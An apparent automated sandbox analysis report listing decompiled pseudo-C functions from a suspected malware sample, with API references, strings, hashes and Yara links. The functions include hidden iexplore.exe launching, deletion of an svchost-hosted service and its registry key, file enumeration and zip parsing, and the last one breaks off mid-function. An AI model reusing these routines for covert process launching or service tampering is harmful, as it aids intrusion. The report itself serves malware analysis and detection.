Instruction Fuzzy Hash: 43212331C0868CEAFB01E7A48C4C7FDBFB8EF1234AF0041AAD595B61A1CB794A44C761

Uniqueness

Uniqueness Score: -1.00%

Function 004165BB, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 106
filestringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E004165BB(void* __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t19;
				void* _t26;
				void* _t28;
				void* _t39;
				long _t43;
				CHAR* _t46;
				void* _t47;
				void* _t57;
				void* _t59;
				void* _t61;
				void* _t64;
				signed int _t66;
				void* _t68;

				_t57 = __edx;
				_t66 = _t68 - 0x90;
				_t19 =  *0x44f5d0; // 0x8e7de579
				 *(_t66 + 0x8c) = _t19 ^ _t66;
				_t46 =  *(_t66 + 0x98);
				_t59 = __ecx;
				E004162F0(__ecx);
				_t75 = _t46;
				if(_t46 != 0) {
					__eflags = lstrlenA(_t46) - 0x104;
					if(__eflags < 0) {
						goto L2;
					} else {
						_push(0xa0);
						goto L6;
					}
				} else {
					_t46 = 0x43eff0;
					L2:
					 *(_t59 + 8) = E0040A3C7(_t75, 0x140);
					E0040AA60(_t57, _t66, _t23 + 0x2c, 0x104, _t46);
					_t26 = FindFirstFileA(_t46,  *(_t59 + 8));
					 *(_t59 + 0xc) = _t26;
					if(_t26 != 0xffffffff) {
						_t49 = _t59 + 0x10;
						 *((intOrPtr*)(_t66 - 0x7c)) = _t59 + 0x10;
						 *((intOrPtr*)(_t66 - 0x78)) = E0040E857(_t46, _t59 + 0x10, _t66, 0x104);
						_t28 = E00429AC6(_t59 + 0x10, _t57, _t27, _t46, 0x104);
						__eflags = _t28;
						if(_t28 != 0) {
							E004054F0(E00429396(_t49, _t57,  *((intOrPtr*)(_t66 - 0x78)), _t66 - 0x80, 3, _t66 - 0x74, 0x100, 0, 0, 0, 0));
							E004054F0(E004295B7(_t49, _t57,  *((intOrPtr*)(_t66 - 0x78)), 0x104, _t66 - 0x80, _t66 - 0x74, 0, 0));
							E0040D723(_t46,  *((intOrPtr*)(_t66 - 0x7c)), 0, _t66, 0xffffffff);
							_t39 = 1;
							__eflags = 1;
						} else {
							L00401D20(_t46,  *((intOrPtr*)(_t66 - 0x7c)), _t59, _t66, _t28);
							E004162F0(_t59);
							_push(0x7b);
							goto L6;
						}
					} else {
						_t43 = GetLastError();
						E004162F0(_t59);
						_push(_t43);
						L6:
						SetLastError();
						_t39 = 0;
					}
				}
				_pop(_t61);
				_pop(_t64);
				_pop(_t47);
				return E0042569C(_t39, _t47,  *(_t66 + 0x8c) ^ _t66, _t57, _t61, _t64);
			}

APIs

FindFirstFileA.KERNEL32(?,?,?,?,?), ref: 00416613
GetLastError.KERNEL32(?,?,?), ref: 00416621
lstrlenA.KERNEL32(?,?,?), ref: 00416634
SetLastError.KERNEL32(0000007B,00000000,?,?,00000104,?,?,?), ref: 00416643

Part of subcall function 0040A3C7: _malloc.LIBCMT ref: 0040A3E1

Part of subcall function 0040AA60: _strcpy_s.LIBCMT ref: 0040AA6C

__fullpath.LIBCMT ref: 0041665F
__splitpath_s.LIBCMT ref: 00416697
__makepath_s.LIBCMT ref: 004166B0

Strings

*.*, xrefs: 004165EF, 004165FE, 00416612

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$FileFindFirst__fullpath__makepath_s__splitpath_s_malloc_strcpy_slstrlen
String ID: *.*
API String ID: 23357613-438819550
Opcode ID: ab3d4d31e323d34e6fdc7794e1343755ab2062fa98989214a2497f544e362d15
Instruction ID: 6c284f8837f1028b42c2b70b37470a79ba50a60f33e4c7947cf996f8d2d32e74
Opcode Fuzzy Hash: ab3d4d31e323d34e6fdc7794e1343755ab2062fa98989214a2497f544e362d15
Instruction Fuzzy Hash: 8F31D472A002046BDB20BBB79C45EEFBA6CAF48314F10443EF515E3182DE78D544CB68

Uniqueness

Uniqueness Score: -1.00%

Function 10005400, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 77
stringprocessCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10005400(char* _a4, intOrPtr _a8) {
				struct _STARTUPINFOA _v72;
				struct _PROCESS_INFORMATION _v88;
				char _v348;
				CHAR* _t26;
				signed int _t37;

				if(strlen(_a4) != 0) {
					memset( &_v348, 0, 0x104);
					if(E1000D28E(0x80000000, "Applications\\iexplore.exe\\shell\\open\\command", 0, 1,  &_v348, 0, 0x104, 0) != 0 && lstrlenA( &_v348) != 0) {
						_t26 = strstr( &_v348, "%1");
						if(_t26 != 0) {
							lstrcpyA(_t26, _a4);
							_t37 = 0x10;
							memset( &(_v72.lpReserved), 0, _t37 << 2);
							_v72.cb = 0x44;
							if(_a8 == 0) {
								_v72.dwFlags = 1;
								_v72.wShowWindow = 0;
							} else {
								_v72.lpDesktop = "WinSta0\\Default";
							}
							CreateProcessA(0,  &_v348, 0, 0, 0, 0, 0, 0,  &_v72,  &_v88);
						}
					}
				}
				return 0;
			}

0x10005417
0x1000542d
0x10005454
0x10005473
0x1000547d
0x10005483
0x10005490
0x10005494
0x10005496
0x1000549d
0x100054a8
0x100054af
0x1000549f
0x1000549f
0x1000549f
0x100054c9
0x100054c9
0x1000547d
0x10005454
0x100054d4

APIs

strlen.MSVCRT ref: 1000540E
memset.MSVCRT ref: 1000542D

Part of subcall function 1000D28E: memset.MSVCRT ref: 1000D2C3
Part of subcall function 1000D28E: memset.MSVCRT ref: 1000D2D7
Part of subcall function 1000D28E: memset.MSVCRT ref: 1000D2E6
Part of subcall function 1000D28E: LoadLibraryA.KERNEL32(ADVAPI32.dll), ref: 1000D2F4
Part of subcall function 1000D28E: GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 1000D30C
Part of subcall function 1000D28E: GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 1000D31C
Part of subcall function 1000D28E: GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 1000D32C
Part of subcall function 1000D28E: GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 1000D339
Part of subcall function 1000D28E: GetProcAddress.KERNEL32(?,RegCloseKey), ref: 1000D346
Part of subcall function 1000D28E: FreeLibrary.KERNEL32(?), ref: 1000D4D2

lstrlenA.KERNEL32(?), ref: 1000545D
strstr.MSVCRT ref: 10005473
lstrcpyA.KERNEL32(00000000,?), ref: 10005483
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 100054C9

Strings

D, xrefs: 10005496
Applications\iexplore.exe\shell\open\command, xrefs: 10005440

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: AddressProc$memset$Library$CreateFreeLoadProcesslstrcpylstrlenstrlenstrstr
String ID: Applications\iexplore.exe\shell\open\command$D
API String ID: 2952214944-535818822
Opcode ID: b78f88b17f2770eac0ff926d72cb2488d3ecad068e43302c9c6931b77abf4634
Instruction ID: 1daecd66c80332da1047c9c2203050057b85c1d3445eb3c29a13f1cf3bf8855f
Opcode Fuzzy Hash: b78f88b17f2770eac0ff926d72cb2488d3ecad068e43302c9c6931b77abf4634
Instruction Fuzzy Hash: BE218172901228BAEB50DBE1DC4CADF7FBCEF85392F104015FA09E6144DB759685CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 100032B8, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46
servicestringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100032B8(void* __esi, char* _a4) {
				int _t5;
				int _t16;
				void* _t17;
				void* _t20;
				intOrPtr* _t22;

				_t5 = lstrlenA(_a4);
				if(_t5 != 0) {
					E10002F38(_a4);
					 *_t22 = 0xf003f;
					_t17 = OpenSCManagerA(0, 0, _t16);
					if(_t17 != 0) {
						_t20 = OpenServiceA(_t17, _a4, 0xf01ff);
						if(_t20 != 0) {
							DeleteService(_t20);
							CloseServiceHandle(_t20);
						}
						CloseServiceHandle(_t17);
					}
					return E1000D502(0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost", _a4, 0, 0, 0, 3);
				}
				return _t5;
			}

0x100032be
0x100032c6
0x100032cd
0x100032d4
0x100032e3
0x100032e7
0x100032f9
0x100032fd
0x10003300
0x10003307
0x10003307
0x1000330e
0x10003314
0x00000000
0x10003330
0x10003332

APIs

lstrlenA.KERNEL32(?), ref: 100032BE

Part of subcall function 10002F38: OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 10002F48
Part of subcall function 10002F38: OpenServiceA.ADVAPI32(00000000,?,000F01FF), ref: 10002F5E
Part of subcall function 10002F38: QueryServiceStatus.ADVAPI32(00000000,?), ref: 10002F6F
Part of subcall function 10002F38: ControlService.ADVAPI32(00000000,00000001,?), ref: 10002F86
Part of subcall function 10002F38: Sleep.KERNEL32(0000000A), ref: 10002F98
Part of subcall function 10002F38: QueryServiceStatus.ADVAPI32(00000000,?), ref: 10002FA3
Part of subcall function 10002F38: CloseServiceHandle.ADVAPI32(00000000), ref: 10002FAC
Part of subcall function 10002F38: CloseServiceHandle.ADVAPI32(00000000), ref: 10002FB3

OpenSCManagerA.ADVAPI32(00000000,00000000,?), ref: 100032DD
OpenServiceA.ADVAPI32(00000000,?,000F01FF), ref: 100032F3
DeleteService.ADVAPI32(00000000), ref: 10003300
CloseServiceHandle.ADVAPI32(00000000), ref: 10003307
CloseServiceHandle.ADVAPI32(00000000), ref: 1000330E

Strings

SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost, xrefs: 1000331D

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: Service$CloseHandleOpen$ManagerQueryStatus$ControlDeleteSleeplstrlen
String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost
API String ID: 2491119098-1784019800
Opcode ID: e246187774d72abc35fc8db201755d2a2bb858ad91d35bf5459af4608c81ae52
Instruction ID: b5dd6998a142459b5ced70e108a620f9732ee5bbe2a8ae442e14fb54589c41a1
Opcode Fuzzy Hash: e246187774d72abc35fc8db201755d2a2bb858ad91d35bf5459af4608c81ae52
Instruction Fuzzy Hash: 3EF03C72200128BBFB126FA1DCC9DBF3FACFB456E5B114068FA0951025CB358F52A6A1

Uniqueness

Uniqueness Score: -1.00%

Function 00421296, Relevance: 12.1, APIs: 8, Instructions: 129
filestringCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00421296(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t38;
				long _t49;
				CHAR* _t50;
				CHAR* _t56;
				CHAR* _t59;
				void* _t61;
				int _t65;
				CHAR* _t74;
				void* _t75;
				void* _t76;
				void* _t89;
				void* _t90;
				CHAR* _t92;
				void* _t93;
				void* _t96;
				struct _WIN32_FIND_DATAA* _t98;
				void* _t100;

				_t90 = __edx;
				_t76 = __ecx;
				_t98 = _t100 - 0x13c;
				_t38 =  *0x44f5d0; // 0x8e7de579
				 *(_t98 + 0x140) = _t38 ^ _t98;
				_push(0x14);
				E004271DA(E0043B2A4, __ebx, __edi, __esi);
				_t92 =  *(_t98 + 0x14c);
				_t74 =  *(_t98 + 0x150);
				 *((intOrPtr*)(_t98 - 0x18)) =  *((intOrPtr*)(_t98 + 0x154));
				if((0 | _t92 != 0x00000000) == 0) {
					L1:
					E00415838(_t76);
				}
				if((0 | _t74 != 0x00000000) == 0) {
					goto L1;
				}
				_t49 = GetFullPathNameA(_t74, 0x104, _t92, _t98 - 0x14);
				if(_t49 != 0) {
					__eflags = _t49 - 0x104;
					if(_t49 >= 0x104) {
						goto L5;
					} else {
						E00401FA0(_t98 - 0x10, E004151D0());
						 *(_t98 - 4) =  *(_t98 - 4) & 0x00000000;
						E004210CC(_t74, _t98, __eflags, _t92, _t98 - 0x10);
						_t56 = PathIsUNCA( *(_t98 - 0x10));
						__eflags = _t56;
						if(_t56 != 0) {
							L19:
							E00401E60( &(( *(_t98 - 0x10))[0xfffffffffffffff0]), _t90);
							_t50 = 1;
							__eflags = 1;
						} else {
							_t59 = GetVolumeInformationA( *(_t98 - 0x10), _t56, _t56, _t56, _t98 - 0x20, _t98 - 0x1c, _t56, _t56);
							__eflags = _t59;
							if(_t59 != 0) {
								__eflags =  *(_t98 - 0x1c) & 0x00000002;
								if(( *(_t98 - 0x1c) & 0x00000002) == 0) {
									CharUpperA(_t92);
								}
								__eflags =  *(_t98 - 0x1c) & 0x00000004;
								if(( *(_t98 - 0x1c) & 0x00000004) != 0) {
									goto L19;
								} else {
									_t61 = FindFirstFileA(_t74, _t98);
									__eflags = _t61 - 0xffffffff;
									if(_t61 == 0xffffffff) {
										goto L19;
									} else {
										FindClose(_t61);
										__eflags =  *(_t98 - 0x14);
										if( *(_t98 - 0x14) == 0) {
											goto L10;
										} else {
											__eflags =  *(_t98 - 0x14) - _t92;
											if( *(_t98 - 0x14) <= _t92) {
												goto L10;
											} else {
												_t65 = lstrlenA( &(_t98->cFileName));
												_t89 =  *(_t98 - 0x14) - _t92;
												__eflags = _t65 + _t89 - 0x104;
												if(_t65 + _t89 >= 0x104) {
													goto L10;
												} else {
													__eflags = 0x104 - _t89;
													E0040AA60(_t90, _t98,  *(_t98 - 0x14), 0x104 - _t89,  &(_t98->cFileName));
													goto L19;
												}
											}
										}
									}
								}
							} else {
								_push(_t74);
								E0042126B(_t92,  *((intOrPtr*)(_t98 - 0x18)));
								L10:
								E00401E60( &(( *(_t98 - 0x10))[0xfffffffffffffff0]), _t90);
								goto L5;
							}
						}
					}
				} else {
					E00414516(_t98, _t92, 0x104, _t74, 0xffffffff);
					_push(_t74);
					E0042126B(_t92,  *((intOrPtr*)(_t98 - 0x18)));
					L5:
					_t50 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t98 - 0xc));
				_pop(_t93);
				_pop(_t96);
				_pop(_t75);
				return E0042569C(_t50, _t75,  *(_t98 + 0x140) ^ _t98, _t90, _t93, _t96);
			}

APIs

__EH_prolog3.LIBCMT ref: 004212B5
GetFullPathNameA.KERNEL32(?,00000104,?,?,00000014), ref: 004212F6

Part of subcall function 00415838: __CxxThrowException@8.LIBCMT ref: 0041584C

PathIsUNCA.SHLWAPI(?,?,?,00000000), ref: 00421340
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0042135E
CharUpperA.USER32(?), ref: 00421385
FindFirstFileA.KERNEL32(?,00000000), ref: 00421396
FindClose.KERNEL32(00000000), ref: 004213A2
lstrlenA.KERNEL32(?), ref: 004213B7

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: FindPath$CharCloseException@8FileFirstFullH_prolog3InformationNameThrowUpperVolumelstrlen
String ID:
API String ID: 3249967234-0
Opcode ID: 3229c62922a96855c3a6700e6715c37928a20b2e9a94d9f2fe1bd77dbba2b880
Instruction ID: 10f9dfe8eb3e0447193dda21dd33110236a90c8cf13cd0c8911950e0aca7139e
Opcode Fuzzy Hash: 3229c62922a96855c3a6700e6715c37928a20b2e9a94d9f2fe1bd77dbba2b880
Instruction Fuzzy Hash: BE41A471A00119ABEB11EBB5ED45AFF777DEF14318F50012AFC15E22E1DB389905CA68

Uniqueness

Uniqueness Score: -1.00%

Function 00408E60, Relevance: 10.9, APIs: 1, Strings: 5, Instructions: 408
COMMONCrypto

Download Yara Rule

C-Code - Quality: 81%

			E00408E60(intOrPtr* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				char _v276;
				char _v540;
				unsigned int _v568;
				intOrPtr _v592;
				intOrPtr _v596;
				unsigned int _v604;
				unsigned int _v620;
				struct _FILETIME _v628;
				struct _FILETIME _v636;
				intOrPtr* _v640;
				char _v644;
				char _v646;
				char _v647;
				char _v648;
				void* _v652;
				void* _v653;
				signed int _v660;
				signed char _v661;
				signed int _v662;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t157;
				intOrPtr _t159;
				signed int _t165;
				signed int _t171;
				void* _t172;
				void* _t174;
				signed int _t175;
				signed int _t176;
				signed int _t177;
				signed int _t178;
				signed int _t179;
				intOrPtr* _t180;
				unsigned int _t181;
				signed char _t183;
				long _t186;
				long _t189;
				signed int _t190;
				signed int _t195;
				signed char _t197;
				signed int _t198;
				intOrPtr _t209;
				intOrPtr _t217;
				void* _t233;
				void* _t235;
				signed char _t240;
				char _t241;
				void* _t242;
				void* _t243;
				void* _t244;
				void* _t245;
				signed int _t256;
				signed int _t257;
				signed char _t260;
				intOrPtr _t269;
				signed char _t279;
				signed int _t286;
				signed int _t287;
				signed int _t308;
				signed char _t312;
				signed int _t319;
				signed int _t320;
				intOrPtr* _t322;
				void* _t323;
				void* _t324;
				intOrPtr* _t326;
				signed int _t328;
				void* _t333;
				void* _t334;
				void* _t335;
				void* _t339;
				intOrPtr* _t341;
				void* _t342;
				intOrPtr _t343;
				void* _t344;
				intOrPtr _t345;
				void* _t346;
				void* _t347;
				signed int _t349;
				void* _t350;
				void* _t352;
				void* _t354;
				void* _t355;
				signed int _t356;
				signed int _t358;
				signed int _t359;
				void* _t361;

				_t299 = __edx;
				_t358 = (_t356 & 0xfffffff8) - 0x294;
				_t157 =  *0x44f5d0; // 0x8e7de579
				_v8 = _t157 ^ _t358;
				_t159 = _a4;
				_t322 = __ecx;
				_t341 = __edx;
				_v640 = __ecx;
				_v652 = __edx;
				if(_t159 < 0xffffffff) {
					L72:
					_pop(_t323);
					_pop(_t342);
					_pop(_t233);
					__eflags = _v8 ^ _t358;
					return E0042569C(0x10000, _t233, _v8 ^ _t358, _t299, _t323, _t342);
				} else {
					_t234 =  *__ecx;
					if(_t159 >=  *((intOrPtr*)( *__ecx + 4))) {
						goto L72;
					} else {
						if( *((intOrPtr*)(__ecx + 4)) != 0xffffffff) {
							E00408BD0(_t234, __edx, _t355);
							_t159 = _a4;
						}
						 *((intOrPtr*)(_t322 + 4)) = 0xffffffff;
						if(_t159 !=  *((intOrPtr*)(_t322 + 0x134))) {
							__eflags = _t159 - 0xffffffff;
							if(_t159 != 0xffffffff) {
								_t343 =  *_t322;
								__eflags = _t159 -  *((intOrPtr*)(_t343 + 0x10));
								if(_t159 <  *((intOrPtr*)(_t343 + 0x10))) {
									E004085A0(_t343);
									_t159 = _a4;
								}
								__eflags =  *((intOrPtr*)( *_t322 + 0x10)) - _t159;
								while(__eflags < 0) {
									E004085E0( *_t322);
									__eflags =  *((intOrPtr*)( *_t322 + 0x10)) - _a4;
								}
								E00408580( &_v540,  &_v620,  *_t322);
								_t303 =  *_t322;
								_t165 = E00408640(__eflags,  *_t322,  &_v648,  &_v660,  &_v644);
								_t359 = _t358 + 0x10;
								__eflags = _t165;
								if(_t165 == 0) {
									_t304 = 0;
									__eflags = E00407DE0( *((intOrPtr*)( *_t322)), _v660, 0);
									if(__eflags != 0) {
										L19:
										_pop(_t324);
										_pop(_t344);
										_pop(_t235);
										__eflags = _v8 ^ _t359;
										return E0042569C(0x800, _t235, _v8 ^ _t359, _t304, _t324, _t344);
									} else {
										_t345 = _v644;
										_t171 = E0040A3F7(__eflags, _t345);
										_t325 =  *((intOrPtr*)( *_t322));
										_v660 = _t171;
										_t172 = E00407E70(1, _t171,  *((intOrPtr*)( *_t322)), _t355, _t345);
										_t361 = _t359 + 8;
										__eflags = _t172 - _t345;
										if(__eflags == 0) {
											_t346 = _v652;
											 *_t346 =  *( *_v640 + 0x10);
											_t174 = 0;
											do {
												_t256 =  *((intOrPtr*)(_t361 + _t174 + 0x88));
												 *((char*)(_t361 + _t174 + 0x190)) = _t256;
												_t174 = _t174 + 1;
												__eflags = _t256;
											} while (_t256 != 0);
											_t326 =  &_v276;
											while(1) {
												_t175 =  *_t326;
												__eflags = _t175;
												if(_t175 == 0) {
													goto L26;
												}
												L24:
												__eflags =  *((intOrPtr*)(_t326 + 1)) - 0x3a;
												if( *((intOrPtr*)(_t326 + 1)) == 0x3a) {
													_t326 = _t326 + 2;
													while(1) {
														_t175 =  *_t326;
														__eflags = _t175;
														if(_t175 == 0) {
															goto L26;
														}
														goto L24;
													}
												}
												L26:
												__eflags = _t175 - 0x5c;
												if(_t175 == 0x5c) {
													_t326 = _t326 + 1;
													while(1) {
														_t175 =  *_t326;
														__eflags = _t175;
														if(_t175 == 0) {
															goto L26;
														}
														goto L24;
													}
												}
												__eflags = _t175 - 0x2f;
												if(_t175 == 0x2f) {
													_t326 = _t326 + 1;
													while(1) {
														_t175 =  *_t326;
														__eflags = _t175;
														if(_t175 == 0) {
															goto L26;
														}
														goto L24;
													}
												}
												_t176 = E00426A8C(_t326, "\\..\\");
												_t361 = _t361 + 8;
												__eflags = _t176;
												if(_t176 != 0) {
													_t51 = _t176 + 4; // 0x4
													_t326 = _t51;
													while(1) {
														_t175 =  *_t326;
														__eflags = _t175;
														if(_t175 == 0) {
															goto L26;
														}
														goto L24;
													}
												}
												_t177 = E00426A8C(_t326, "\\../");
												_t361 = _t361 + 8;
												__eflags = _t177;
												if(_t177 != 0) {
													_t52 = _t177 + 4; // 0x4
													_t326 = _t52;
													while(1) {
														_t175 =  *_t326;
														__eflags = _t175;
														if(_t175 == 0) {
															goto L26;
														}
														goto L24;
													}
												}
												_t178 = E00426A8C(_t326, "/../");
												_t361 = _t361 + 8;
												__eflags = _t178;
												if(_t178 != 0) {
													_t53 = _t178 + 4; // 0x4
													_t326 = _t53;
													while(1) {
														_t175 =  *_t326;
														__eflags = _t175;
														if(_t175 == 0) {
															goto L26;
														}
														goto L24;
													}
													goto L26;
												}
												_t179 = E00426A8C(_t326, "/..\\");
												_t361 = _t361 + 8;
												__eflags = _t179;
												if(_t179 != 0) {
													_t54 = _t179 + 4; // 0x4
													_t326 = _t54;
													continue;
												}
												_t180 = _t326;
												_t308 = _t346 + 4 - _t326;
												__eflags = _t308;
												do {
													_t257 =  *_t180;
													 *((char*)(_t308 + _t180)) = _t257;
													_t180 = _t180 + 1;
													__eflags = _t257;
												} while (_t257 != 0);
												_t181 = _v568;
												_t260 = _t181 >> 0x0000001e & 0x00000001;
												_t312 =  !(_t181 >> 0x17) & 0x00000001;
												_t328 = _v620 >> 8;
												__eflags = _t328;
												_v653 = 0;
												_v662 = 0;
												_v661 = 1;
												if(_t328 == 0) {
													L44:
													_v662 = _t181 >> 0x00000002 & 0x00000001;
													_t312 = _t181 & 0x00000001;
													_t240 = _t181 >> 0x00000001 & 0x00000001;
													_t260 = _t181 >> 0x00000004 & 0x00000001;
													_t183 = _t181 >> 0x00000005 & 0x00000001;
												} else {
													__eflags = _t328 - 7;
													if(_t328 == 7) {
														goto L44;
													} else {
														__eflags = _t328 - 0xb;
														if(_t328 == 0xb) {
															goto L44;
														} else {
															__eflags = _t328 - 0xe;
															if(_t328 != 0xe) {
																_t240 = _v653;
																_t183 = _v661;
															} else {
																goto L44;
															}
														}
													}
												}
												__eflags = _t260;
												 *(_t346 + 0x108) = 0;
												if(_t260 != 0) {
													 *(_t346 + 0x108) = 0x10;
												}
												__eflags = _t183;
												if(_t183 != 0) {
													_t67 = _t346 + 0x108;
													 *_t67 =  *(_t346 + 0x108) | 0x00000020;
													__eflags =  *_t67;
												}
												__eflags = _t240;
												if(_t240 != 0) {
													_t69 = _t346 + 0x108;
													 *_t69 =  *(_t346 + 0x108) | 0x00000002;
													__eflags =  *_t69;
												}
												__eflags = _t312;
												if(_t312 != 0) {
													_t71 = _t346 + 0x108;
													 *_t71 =  *(_t346 + 0x108) | 0x00000001;
													__eflags =  *_t71;
												}
												__eflags = _v662;
												if(_v662 != 0) {
													_t74 = _t346 + 0x108;
													 *_t74 =  *(_t346 + 0x108) | 0x00000004;
													__eflags =  *_t74;
												}
												 *((intOrPtr*)(_t346 + 0x124)) = _v596;
												 *((intOrPtr*)(_t346 + 0x128)) = _v592;
												_t186 = E00408C80(_v604, _v604 >> 0x10);
												_v628.dwHighDateTime = _t312;
												_t314 =  &_v636;
												_v628.dwLowDateTime = _t186;
												LocalFileTimeToFileTime( &_v628,  &_v636);
												_t189 = _v636.dwLowDateTime;
												_t269 = _v636.dwHighDateTime;
												_t241 = 0;
												__eflags = _v644 - 4;
												 *(_t346 + 0x10c) = _t189;
												 *((intOrPtr*)(_t346 + 0x110)) = _t269;
												 *(_t346 + 0x114) = _t189;
												 *((intOrPtr*)(_t346 + 0x118)) = _t269;
												 *(_t346 + 0x11c) = _t189;
												 *((intOrPtr*)(_t346 + 0x120)) = _t269;
												if(_v644 > 4) {
													_v646 = 0;
													while(1) {
														_t195 = _v660;
														_v648 =  *((intOrPtr*)(_t241 + _t195));
														_t328 = "UT";
														__eflags = 0;
														_v647 =  *((intOrPtr*)(_t195 + _t241 + 1));
														asm("repe cmpsb");
														if(0 == 0) {
															break;
														}
														_t314 =  *(_t241 + _v660 + 2) & 0x000000ff;
														_t241 = _t241 + ( *(_t241 + _v660 + 2) & 0x000000ff) + 4;
														__eflags = _t241 + 4 - _v644;
														if(_t241 + 4 < _v644) {
															continue;
														} else {
														}
														L68:
														_t346 = _v652;
														goto L69;
													}
													_t349 = _v660;
													_t197 =  *(_t241 + _t349 + 4) & 0x000000ff;
													_t279 = _t197 >> 0x00000001 & 0x00000001;
													_t314 = _t197 >> 0x00000002 & 0x00000001;
													_t241 = _t241 + 5;
													__eflags = _t197 & 0x00000001;
													_v661 = _t279;
													_v662 = _t314;
													if((_t197 & 0x00000001) == 0) {
														_t328 = _v652;
													} else {
														_t287 =  *(_t241 + _t349 + 1) & 0x000000ff;
														_t320 =  *(_t241 + _t349) & 0x000000ff;
														_t241 = _t241 + 4;
														_t217 = E00408C60((0 << 0x00000008 | _t287) << 0x00000008 | _t320, _t320);
														_t328 = _v652;
														_t279 = _v661;
														 *(_t328 + 0x120) = _t320;
														_t314 = _v662;
														 *((intOrPtr*)(_t328 + 0x11c)) = _t217;
													}
													__eflags = _t279;
													if(_t279 != 0) {
														_t286 =  *(_t241 + _t349 + 1) & 0x000000ff;
														_t319 =  *(_t241 + _t349) & 0x000000ff;
														_t241 = _t241 + 4;
														__eflags = 0 << 8;
														_t209 = E00408C60((0 << 0x00000008 | _t286) << 0x00000008 | _t319, _t319);
														 *(_t328 + 0x110) = _t319;
														_t314 = _v662;
														 *((intOrPtr*)(_t328 + 0x10c)) = _t209;
													}
													__eflags = _t314;
													if(_t314 != 0) {
														_t198 = _t349;
														_t314 =  *(_t241 + _t198 + 1) & 0x000000ff;
														__eflags =  *(_t241 + _t198) & 0x000000ff | (0 << 0x00000008 | _t314) << 0x00000008;
														 *((intOrPtr*)(_t328 + 0x114)) = E00408C60( *(_t241 + _t198) & 0x000000ff | (0 << 0x00000008 | _t314) << 0x00000008, _t314);
														 *(_t328 + 0x118) = _t314;
													}
													goto L68;
												}
												L69:
												_t190 = _v660;
												__eflags = _t190;
												if(__eflags != 0) {
													_push(_t190);
													E0040A3F2(_t241, _t314, _t328, _t346, __eflags);
													_t361 = _t361 + 4;
												}
												memcpy(_v640 + 8, _t346, 0x4b << 2);
												 *((intOrPtr*)(_v640 + 0x134)) = _a4;
												_pop(_t333);
												_pop(_t347);
												_pop(_t242);
												__eflags = _v8 ^ _t361 + 0xc;
												return E0042569C(0, _t242, _v8 ^ _t361 + 0xc, _v640, _t333, _t347);
												goto L73;
											}
										} else {
											_t304 = _v660;
											_push(_v660);
											E0040A3F2(1, _v660, _t325, _t345, __eflags);
											_t359 = _t361 + 4;
											goto L19;
										}
									}
								} else {
									_pop(_t334);
									_pop(_t350);
									_pop(_t243);
									__eflags = _v8 ^ _t359;
									return E0042569C(0x700, _t243, _v8 ^ _t359, _t303, _t334, _t350);
								}
							} else {
								goto L8;
							}
						} else {
							if(_t159 == 0xffffffff) {
								L8:
								 *_t341 =  *((intOrPtr*)( *_t322 + 4));
								 *((char*)(_t341 + 4)) = 0;
								 *((intOrPtr*)(_t341 + 0x108)) = 0;
